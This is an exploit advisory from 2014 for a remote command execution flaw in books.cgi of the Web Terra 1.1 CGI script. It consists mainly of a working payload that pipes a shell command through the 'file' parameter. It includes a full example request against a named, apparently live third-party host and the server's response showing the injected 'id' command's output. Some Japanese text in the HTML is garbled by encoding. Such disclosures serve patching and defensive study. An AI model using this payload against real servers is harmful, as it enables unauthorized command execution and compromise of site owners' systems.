46 lines
No EOL
1.4 KiB
Text
46 lines
No EOL
1.4 KiB
Text
[+] Remote Comand Execution on books.cgi Web Terra v. 1.1
|
||
[+] Date: 21/05/2014
|
||
[+] CWE number: CWE-78
|
||
[+] Risk: High
|
||
[+] Author: Felipe Andrian Peixoto
|
||
[+] Contact: felipe_andrian@hotmail.com
|
||
[+] Tested on: Windows 7 and Linux
|
||
[+] Vendor Homepage: http://www2.inforyoma.or.jp/~terra
|
||
[+] Vulnerable File: books.cgi
|
||
[+] Version : 1.1
|
||
[+] Exploit: http://host/patch/books.cgi?file=|<command>|
|
||
|
||
|
||
[+] Example Request:
|
||
GET /webnovel/books.cgi?file=|id| HTTP/1.1
|
||
Host: redsuns.x0.com
|
||
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:29.0) Gecko/20100101 Firefox/29.0
|
||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||
Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
|
||
Accept-Encoding: gzip, deflate
|
||
DNT: 1
|
||
Connection: keep-alive
|
||
|
||
|
||
HTTP/1.1 200 OK
|
||
Date: Wed, 21 May 2014 18:59:05 GMT
|
||
Server: Apache/1.3.42 (Unix)
|
||
Connection: close
|
||
Content-Type: text/html
|
||
Content-Length: 498
|
||
|
||
<!DOCTYPE HTML PUBLIC -//IETF//DTD HTML//EN>
|
||
<html><head>
|
||
<meta http-equiv=Content-Type content=text/html; charset=x-sjis>
|
||
<title></title></head>
|
||
<body bgcolor=#637057>
|
||
<p align=center><font size=3></font><br>
|
||
| <a href=booksregist.cgi?file=|id|&subject=>?·?M?·?é</a>
|
||
|| <a href=booksvew.cgi?file=|id|&subject=>???Ò?ê??</a>
|
||
|| <a href=booksedit.cgi?file=|id|&subject=>?ÏX?ù³</a>
|
||
|| <a href=books.htm>?¶?É?É?ß?é</a>
|
||
|</p><hr>
|
||
uid=1085(spider) gid=1000(users) groups=1000(users)
|
||
</body></html>
|
||
|
||
[+] More About : http://cwe.mitre.org/data/definitions/78.html |